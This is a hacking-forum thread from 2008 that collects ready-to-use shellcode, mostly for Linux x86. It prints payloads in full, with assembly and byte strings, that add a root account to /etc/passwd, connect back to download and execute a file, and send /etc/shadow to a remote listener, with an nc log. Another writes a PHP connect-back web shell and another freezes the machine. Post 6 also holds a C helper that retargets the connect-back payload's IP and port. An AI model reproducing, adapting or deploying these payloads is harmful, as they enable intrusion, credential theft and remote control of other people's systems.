Shellcodes
Farid
post Sep 25 2008, 06:43 AM
Post #1
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

We don't have any post dedicated to collecting or requesting shellcodes, so I'm opening this one.
For the sake of organization, one shellcode per post, with the code (between [ code] tags), the size of the shellcode in bytes (in bold [b-]) and the platform it runs on (in bold [b ]). Optional: a description (in italics [ i]) and the author, underlined [ u].


In this post I'll link each shellcode, ordered by platform.

Enjoy!:



(+) linux/x86
add user - 70 bytes
connect back, download a file and execute - 149 bytes
connect back.send.exit /etc/shadow - 155 bytes
iopl(3); asm(cli); while(1){} - 12 bytes
setuid(0) && execve("/bin/sh",0,0)
setresuid(0,0,0) /bin/sh shellcode 35 bytes
system-beep shellcode - 45 bytes
writes a php connectback shell to the fs - 508 bytes

(+) Linux/x86-64
(+) win32
Win 9x/NT/2k/XP PEB method - 29 bytes
(+) win64


(Platforms will be added as more shellcodes come in)


--------------------
QUOTE
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.
Farid
post Sep 25 2008, 06:50 AM
Post #2
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

Win 9x/NT/2k/XP PEB method - 29 bytes shellcode
Author: loco <admin [at] 0x90-team.info>

Shellcode:
CODE
//
// PEB way of getting kernel32 imagebase by loco.
// Compatible with all Win9x/NT based operating systems.
//
// Gives kernel32 imagebase in eax when executing.
// 29 bytes, only eax/esi used.
//
// Originally discovered by Dino Dai Zovi.
//
//

#include <stdio.h>

/*
    xor   eax, eax
    add   eax, fs:[eax+30h]      ; fs:[0x30] is the PEB on NT; on Win9x the value has the sign bit set, hence the js
    js    method_9x

method_nt:
    mov   eax, [eax + 0ch]       ; PEB->Ldr (PEB_LDR_DATA)
    mov   esi, [eax + 1ch]       ; Ldr->InInitializationOrderModuleList.Flink (first entry: ntdll.dll)
    lodsd                        ; eax = second entry (kernel32.dll on the systems listed above)
    mov   eax, [eax + 08h]       ; DllBase, relative to the InInitializationOrder link
    jmp   kernel32_ptr_found

method_9x:
    mov   eax, [eax + 34h]
    lea   eax, [eax + 7ch]
    mov   eax, [eax + 3ch]
kernel32_ptr_found:
*/

unsigned char Shellcode[] =
    "\x33\xC0"          // xor eax, eax
    "\x64\x03\x40\x30"  // add eax, dword ptr fs:[eax+30]
    "\x78\x0C"          // js short $+12
    "\x8B\x40\x0C"      // mov eax, dword ptr [eax+0C]
    "\x8B\x70\x1C"      // mov esi, dword ptr [eax+1C]
    "\xAD"              // lodsd
    "\x8B\x40\x08"      // mov eax, dword ptr [eax+08]
    "\xEB\x09"          // jmp short $+9
    "\x8B\x40\x34"      // mov eax, dword ptr [eax+34]
    "\x8D\x40\x7C"      // lea eax, dword ptr [eax+7C]
    "\x8B\x40\x3C"      // mov eax, dword ptr [eax+3C]
; // = 29 bytes.

int main()
{
    printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1);
    return 1;
}


Farid
post Sep 25 2008, 09:35 AM
Post #3
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

linux/x86 add user - 70 bytes shellcode

Shellcode:
CODE
/*
*  Linux/x86
*
*  Appends the line "z::0:0:::\n" to /etc/passwd.
*  (quite old, could be optimized further)
*/
#include <stdio.h>
#include <string.h>

char c0de[] =
/* main: */
"\xeb\x29"                           /* jmp callz                */
/* start: */
"\x5e"                               /* popl %esi                */
"\x29\xc0"                           /* subl %eax, %eax          */
"\x88\x46\x0b"                       /* movb %al, 0x0b(%esi)     */
"\x89\xf3"                           /* movl %esi, %ebx          */
"\x66\xb9\x01\x04"                   /* movw $0x401, %cx         */
"\x66\xba\xb6\x01"                   /* movw $0x1b6, %dx         */
"\xb0\x05"                           /* movb $0x05, %al          */
"\xcd\x80"                           /* int $0x80                */
"\x93"                               /* xchgl %eax, %ebx         */
"\x29\xc0"                           /* subl %eax, %eax          */
"\x29\xd2"                           /* subl %edx, %edx          */
"\xb0\x04"                           /* movb $0x04, %al          */
"\x89\xf1"                           /* movl %esi, %ecx          */
"\x80\xc1\x0c"                       /* addb $0x0c, %cl          */
"\xb2\x0a"                           /* movb $0x0a, %dl          */
"\xcd\x80"                           /* int $0x80                */
"\x29\xc0"                           /* subl %eax, %eax          */
"\x40"                               /* incl %eax                */
"\xcd\x80"                           /* int $0x80                */
/* callz: */
"\xe8\xd2\xff\xff\xff"               /* call start               */
/* DATA */
"/etc/passwd"
"\xff"
"z::0:0:::\n";

int main(void) {
        int *ret;
        /* Classic trick: overwrite main's saved return address (assumed to sit two
         * words above the local `ret`) so the final ret jumps into c0de. This
         * depends on the compiler's frame layout and on an executable data segment. */
        ret=(int *)&ret +2;
        printf("Shellcode length=%d\n",(int)strlen(c0de));
        (*ret) = (int)c0de;
        return 0;
}


goldenozaro
post Sep 25 2008, 09:57 AM
Post #4
i  marcela <3
Group: Collaborator
Posts: 1,132
Joined: 25-April 06
From: Ciudad Juarez,Chih, Mexico
Member No.: 354

linux/x86 iopl(3); asm(cli); while(1){} 12 bytes

Shellcode:
CODE
/*
    [ dun[at]strcpy.pl ]

[ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ]

############################################################
   iopl(3); asm("cli"); while(1){}
   // * this code freezes the system: iopl(3) needs CAP_SYS_RAWIO (root);
   //   cli then disables interrupts on the current CPU and the jmp spins
   //   forever. Without that privilege cli raises #GP, i.e. SIGSEGV.
############################################################

__asm__(
    "xorl %eax, %eax\n"
    "pushl $0x3\n"
    "popl %ebx\n"
    "movb $0x6e,%al\n"       ; __NR_iopl = 110
    "int $0x80\n"
    "cli\n"
    "x1:\n"
    "jmp x1\n"
);

*/

char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe";

int main() {

    void (*sc)();
    sc = (void (*)())shellcode;   /* needs an executable data segment */
    sc();

return 0;
}

// milw0rm.com [2008-09-17]


--------------------
::Giösue Serran* & Co.::
goldenozaro@hackerss.com


Farid
post Sep 26 2008, 07:21 AM
Post #5
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

linux/x86 system-beep shellcode 45 bytes

Author: Thomas Rinsma <me [at] th0mas.nl>

Shellcode:
CODE
/*
By Thomas Rinsma <me[at]th0mas.nl> (16 apr. 2008)

Shellcode makes system speaker beep once, 45 bytes:


  ;     int fd = open("/dev/tty10", O_RDONLY);
   push byte 5
   pop eax
   cdq
   push edx
   push 0x30317974
   push 0x742f2f2f
   push 0x7665642f
   mov ebx, esp
   mov ecx, edx
   int 80h

  ;     ioctl(fd, KDMKTONE (19248), 66729180);
   mov ebx, eax
   push byte 54
   pop eax
   mov ecx, 4294948047
   not ecx
   mov edx, 66729180
   int 80h
*/


int main(void)
{
   /* runs from the stack: build with -z execstack, otherwise the call faults on NX */
   char shellcode[] =
       "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74"
       "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36"
       "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80";

   (*(void (*)()) shellcode)();
   return 0;
}


Farid
post Sep 26 2008, 08:04 AM
Post #6
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

linux/x86 connect back, download a file and execute 149 bytes

Author: militan <militan.c7 [at] gmail.com>

Shellcode:
CODE
/*
;file download shellcode (149 bytes)
;
;connect back, download a file and execute.  
;modify the name of the file and the ip address first.
;
;militan
;Advanced Defense Lab(ADL)
;



global _start

_start:

xor ecx,ecx
mul ecx
xor ebx,ebx
cdq

;socket
push eax
push byte 0x1
push byte 0x2
mov ecx,esp
inc ebx
mov al,0x66
int 0x80
mov edi,eax            ;edi=sockfd


;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23)  
push edx
push dword 0x2335738c   ;address *
push word 0x0f27       ;port    *
mov dl,0x02
push dx                ;family  1
mov ecx,esp             ;adjust struct
push byte 0x10
push ecx  
push edi               ;sockfd
mov ecx,esp            
mov bl,3                
mov al,102
int 0x80

;sys_open("cb", O_WRONLY|O_CREAT|O_TRUNC = 0x242, 0700 = 0x1c0)
xor ebx,ebx
xor ecx,ecx
push ecx
push word 0x6263       ;file name="cb"
mov ebx,esp
mov cx,0x242            
mov dx,0x1c0           ;Octal
mov al,5
int 0x80
mov esi,eax            ;esi=fd


;
xor ecx,ecx
mul ecx
cdq
mov dx,0x03e8        ;memory chunk=1000=0x03e8: read per time      
    
L1:                        
;sys_read(socket sockfd,buf,len)            
xor ebx,ebx
xor eax,eax
mov al,3
mov ebx,edi           ;edi=sock fd
lea ecx,[esp-1000]     ;memory chunk
int 0x80
;sys_write(fd,*buf,count)
mov ebx,esi              
mov edx,eax              
xor eax,eax
mov al,4
int 0x80
cmp dx,0x03e8          
je L1                 ;loop


CONTINUE:
;sys_close(fd)
mov ebx,esi            
xor eax,eax
mov al,6
int 0x80

;execve[./cb,0]      
xor ecx,ecx
mul ecx
push ecx
push word 0x6263      ;file name="cb"
mov ebx,esp
push ecx
push ebx                  
mov ecx,esp              
mov al,0x0b
int 0x80


EXIT:
xor eax,eax
xor ebx,ebx
inc eax
int 0x80
*/

#include<stdio.h>
#include<string.h>
#include<stdlib.h>


unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80"
"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80"

"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80"
"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
"\x31\xc0\x31\xdb\x40\xcd\x80";

/* Overwrites k()'s saved return address (assumed two words above `ret`) so
 * returning from k() jumps into the shellcode; depends on the compiler's frame
 * layout and on an executable data segment. */
void k(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
}

int main (){
  k();
  return 0;
}


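
Added example, written for this page and not taken from militan's post or from any other code in the thread: the checks worth running before using a connect-back payload like the one above, which also covers the NUL-free constant trick from the system-beep post (KDMKTONE is loaded as `mov ecx, ~0x4B30 ; not ecx` because 0x00004B30 itself contains NUL bytes). The code embeds the bytes exactly as posted above (sizeof on them gives 151, which the patcher uses as its layout check; the post's title says 149), scans them for the bytes that usually break string-delivered payloads, and rewrites the `push dword <ip>` / `push word <port>` immediates that the post tells you to modify, reporting how many bad chars the new address introduces. The bad-char set and the target addresses are assumptions chosen for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The connect-back shellcode exactly as posted above. */
static unsigned char connectback[] =
    "\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
    "\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80"
    "\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80"
    "\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80"
    "\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
    "\x31\xc0\x31\xdb\x40\xcd\x80";

/* Assumed bad-char set: NUL for strcpy()-style copies, CR/LF for line-oriented readers. */
static const unsigned char default_bad[] = { 0x00, 0x0a, 0x0d };

size_t shellcode_len(void) { return sizeof(connectback) - 1; }

/* Number of bytes of buf that belong to the bad-char set. */
size_t count_badchars(const unsigned char *buf, size_t len,
                      const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) { hits++; break; }
    return hits;
}

/* NOT trick from the beep shellcode: returns the value to load with
 * `mov reg, X ; not reg` when ~v has no NUL byte, 0 when it does not help. */
uint32_t nul_free_not(uint32_t v)
{
    uint32_t n = ~v;
    for (int i = 0; i < 4; i++)
        if (((n >> (8 * i)) & 0xffu) == 0)
            return 0;
    return n;
}

/* Offsets of the immediates in the posted bytes:
 * `push dword <ip>` is 68 xx xx xx xx at 22, `push word <port>` is 66 68 xx xx at 27. */
enum { IP_IMM = 23, PORT_IMM = 29 };

/* Rewrites the target in place. Returns the number of bad chars among the six
 * patched bytes, or -1 if the buffer is not the posted layout or ip is malformed. */
int patch_connectback(unsigned char *sc, size_t len, const char *ip, uint16_t port)
{
    unsigned a, b, c, d;
    if (len != 151 || sc[IP_IMM - 1] != 0x68 ||
        sc[PORT_IMM - 2] != 0x66 || sc[PORT_IMM - 1] != 0x68)
        return -1;
    if (sscanf(ip, "%u.%u.%u.%u", &a, &b, &c, &d) != 4 ||
        a > 255 || b > 255 || c > 255 || d > 255)
        return -1;
    /* sockaddr_in holds both fields in network byte order, so the octets go in
     * as written and the port's high byte first; that is why the post pushes
     * 0x0f27 for port 9999 and 0x2335738c for 140.115.53.35. */
    sc[IP_IMM] = (unsigned char)a; sc[IP_IMM + 1] = (unsigned char)b;
    sc[IP_IMM + 2] = (unsigned char)c; sc[IP_IMM + 3] = (unsigned char)d;
    sc[PORT_IMM] = (unsigned char)(port >> 8); sc[PORT_IMM + 1] = (unsigned char)(port & 0xff);
    return (int)(count_badchars(sc + IP_IMM, 4, default_bad, sizeof default_bad) +
                 count_badchars(sc + PORT_IMM, 2, default_bad, sizeof default_bad));
}

int main(void)
{
    printf("posted blob: %zu bytes, %zu bad chars\n", shellcode_len(),
           count_badchars(connectback, shellcode_len(), default_bad, sizeof default_bad));
    printf("KDMKTONE via NOT: mov ecx, 0x%08x ; not ecx\n", nul_free_not(0x4B30));
    printf("patching to 10.0.0.5:4444 introduces %d bad chars\n",
           patch_connectback(connectback, shellcode_len(), "10.0.0.5", 4444));
    return 0;
}
```

A private address such as 10.0.0.5 puts two NUL bytes and a 0x0a into the payload, so delivery through a C string or a line-based protocol would truncate it; the same NOT trick that the beep post uses for the ioctl constant (or a `sub`/`xor` pair) is the usual way to rebuild such an address in a register before pushing it.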
Farid
post Sep 26 2008, 08:07 AM
Post #7
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

linux/x86 connect back.send.exit /etc/shadow - 155 bytes

Author: 0in <0in.email [at] gmail.com>

Shellcode:
CODE
;                           (C)oDed by 0in
;                   Dark-Coders Group Productions
;        [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
;   >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
;               Contact: 0in[dot]email[at]gmail[dot]com
;           Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
;       nasm -f elf shellcode.asm
;       ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::

;The code (Assembler version):

Section .text
    global _start

_start:
         ;open(file,O_RDONLY):
        xor ebx,ebx
        push byte 0x77;/etc/shadow
        push word 0x6f64
        push 0x6168732f
        push 0x6374652f; ----------
        mov ebx,esp; first arg - filename
        xor ax,ax
        inc ax
        inc ax
        inc ax
        inc ax
        inc ax; ax = 5 (O_RDONLY)
        int 0x80
        mov ebx,eax
       ;read(file,buff,1222):
        xor ax,ax
        inc ax
        inc ax
        inc ax; syscall id = 3
        mov dx,1222; size to read
        push esp
        mov ecx,[esp]; memory
        int 0x80
        mov esi,eax; file to ESI
       ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP)
        xor ebx,ebx
        push ebx;0; 3rd arg
        inc ebx
        push ebx;1; 2nd arg
        inc ebx
        push ebx;2; 1st arg
                   ;socketcall()
        mov ax,1666;--------------
        sub ax,1564;--------------
        xor bx,bx  ; socket() call id
        inc bx     ;- - - - - - - - -
        mov ecx,esp; socket()
        int 0x80   ; do it!
        pop ebx; clear mem
       ;connect(eax,struct server,16)
                 ;16 - sizeof struct sockaddr
        mov edx, eax
        xor ebx,ebx
        xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to your IP)
        push ebx
        mov bx,1666; definition of struct sockaddr
        sub bx,1634; we can't have 0x00 here (port 8192 = 0x2000)
        push bx
        mov al, 2;
        push ax
        mov ecx, esp
        mov al, 16
        push eax
        push ecx
        push edx
        mov al, 102
        mov bx,1666
        sub bx,1663;---------------------------------
        mov ecx, esp
        int 0x80; call connect
        mov ebx,eax; socket to ebx
       ; Ok! so...
       ; Lets write file to server and go down!
       ;write(socket,file,1222)
        pop ebx
        mov ax,1666
        sub ax,1662
        push esi
        mov dx,16666
        sub dx,15444
        int 0x80
       ;exit(1) :
        xor eax,eax;----------
        inc eax
        mov ebx,eax;----------
        int 0x80   ; do it!
;C:
;   #include <stdio.h>
;   char shellcode[]="\x31\xdb"
;   "\x6a\x77"
;   "\x66\x68\x64\x6f"
;   "\x68\x2f\x73\x68\x61"
;   "\x68\x2f\x65\x74\x63"
;   "\x89\xe3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\xba\xc6\x04"
;   "\x54"
;   "\x8b\x0c\x24"
;   "\xcd\x80"
;   "\x89\xc6"
;   "\x31\xdb"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x1c\x06"
;   "\x66\x31\xdb"
;   "\x66\x43"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x5b"
;   "\x89\xc2"
;   "\x31\xdb"
;   "\x53"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x62\x06"
;   "\x66\x53"
;   "\xb0\x02"
;   "\x66\x50"
;   "\x89\xe1"
;   "\xb0\x10"
;   "\x50"
;   "\x51"
;   "\x52"
;   "\xb0\x66"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x7f\x06"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x5b"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x7e\x06"
;   "\x56"
;   "\x66\xba\x1a\x41"
;   "\x66\x81\xea\x54\x3c"
;   "\xcd\x80"
;   "\x31\xc0"
;   "\x40"
;   "\x89\xc3"
;   "\xcd\x80";
;   int main(int argc, char **argv)
;    {
;        int *ret;
;        ret = (int *)&ret + 2;
;        (*ret) = (int) shellcode;
;    }


Farid
post Sep 26 2008, 08:11 AM
Post #8
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479

linux/x86 writes a php connectback shell to the fs 508 bytes

Author: GS2008 http://grayscale-research.org


Shellcode:
CODE
#include <stdlib.h>

        /* Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode
         *
         *      Function:
         *              Opens /var/www/cb.php and writes a php connectback shell to the filesystem.
         *
         *      Shellcode Size: 508 bytes (No Encodings)
         *
         *      PHP Shell Usage:
         *              // victim
         *              http://vulnhost.com/cb.php?host=192.168.1.1&port=777
         *
         *              // attacker
         *              nc -l -p 777
         *
         *      greets: #c-, #hhp, #oldskewl, d-town, sd2600, dc214, everyone else.
     *      
     *      
         *      ~roonr
         */


    // shellcode
        char sc[] = "\x68\x70\x68\x70\xff\x68\x2f\x63\x62\x2e\x68\x2f\x77\x77\x77\x68"
             "\x2f\x76\x61\x72\x31\xc0\x89\xe6\x88\x46\x0f\x89\xe3\x31\xc9\xb1"
             "\x42\x31\xd2\xb2\xff\x31\xc0\xb0\x05\xcd\x80\x31\xdb\x88\xc3\x68"
             "\x3f\x3e\xff\xff\x68\x3b\x7d\x20\x7d\x68\x24\x72\x29\x29\x68\x6c"
             "\x65\x6e\x28\x68\x20\x73\x74\x72\x68\x20\x24\x72\x2c\x68\x6f\x63"
             "\x6b\x2c\x68\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74"
             "\x5f\x68\x3b\x73\x6f\x63\x68\x31\x24\x20\x22\x68\x73\x75\x31\x2e"
             "\x68\x5c\x6e\x63\x62\x68\x2e\x3d\x20\x22\x68\x60\x3b\x24\x72\x68"
             "\x20\x60\x24\x69\x68\x24\x72\x20\x3d\x68\x30\x29\x29\x7b\x68\x2c"
             "\x20\x31\x30\x68\x73\x6f\x63\x6b\x68\x61\x64\x28\x24\x68\x74\x5f"
             "\x72\x65\x68\x6f\x63\x6b\x65\x68\x24\x69\x3d\x73\x68\x69\x6c\x65"
             "\x28\x68\x29\x3b\x77\x68\x68\x22\x2c\x31\x30\x68\x74\x65\x64\x3a"
             "\x68\x6e\x6e\x65\x63\x68\x20\x22\x43\x6f\x68\x6f\x63\x6b\x2c\x68"
             "\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74\x5f\x68\x3b"
             "\x73\x6f\x63\x68\x6f\x72\x74\x29\x68\x2c\x20\x24\x70\x68\x72\x65"
             "\x73\x73\x68\x24\x61\x64\x64\x68\x63\x6b\x2c\x20\x68\x28\x24\x73"
             "\x6f\x68\x6e\x65\x63\x74\x68\x5f\x63\x6f\x6e\x68\x63\x6b\x65\x74"
             "\x68\x29\x3b\x73\x6f\x68\x5f\x54\x43\x50\x68\x2c\x53\x4f\x4c\x68"
             "\x52\x45\x41\x4d\x68\x4b\x5f\x53\x54\x68\x2c\x53\x4f\x43\x68\x49"
             "\x4e\x45\x54\x68\x28\x41\x46\x5f\x68\x65\x61\x74\x65\x68\x74\x5f"
             "\x63\x72\x68\x6f\x63\x6b\x65\x68\x63\x6b\x3d\x73\x68\x3b\x24\x73"
             "\x6f\x68\x72\x74\x27\x5d\x68\x5b\x27\x70\x6f\x68\x5f\x47\x45\x54"
             "\x68\x72\x74\x3d\x24\x68\x3b\x24\x70\x6f\x68\x74\x27\x5d\x29\x68"
             "\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x65\x28\x24\x5f\x68\x79"
             "\x6e\x61\x6d\x68\x6f\x73\x74\x62\x68\x67\x65\x74\x68\x68\x65\x73"
             "\x73\x3d\x68\x61\x64\x64\x72\x68\x73\x65\x7b\x24\x68\x3b\x7d\x65"
             "\x6c\x68\x34\x2e\x22\x29\x68\x72\x20\x34\x30\x68\x45\x72\x72\x6f"
             "\x68\x6e\x74\x28\x22\x68\x7b\x70\x72\x69\x68\x74\x27\x5d\x29\x68"
             "\x27\x70\x6f\x72\x68\x47\x45\x54\x5b\x68\x26\x21\x24\x5f\x68\x74"
             "\x27\x5d\x26\x68\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x28\x21"
             "\x24\x5f\x68\x50\x20\x69\x66\x68\x3c\x3f\x50\x48\x31\xc0\x89\xe6"
             "\xb0\x04\x89\xe1\x66\xba\x62\x01\xcd\x80";

    
int main(){
    

    // run shellcode
        asm("JMP %0;" : "=m" (sc));

    /*
        asm volatile(
            "cb_shellcode:\n"
            "push $0xff706870;"
            "push $0x2e62632f;"
            "push $0x7777772f;"
            "push $0x7261762f;"
            "xor %eax, %eax;"
            "mov %esp, %esi;"
            "movb %al, 0xf(%esi);"
          
            // sys_open
            "mov %esp, %ebx; "
                    "xor %ecx, %ecx;"
                "movb $0x42, %cl;"
                "xor %edx, %edx;"
                "movb $0xff, %dl;"
                "xor %eax, %eax;"
                 "movb $0x05, %al;"
            "int $0x80;"
            
            // sys_write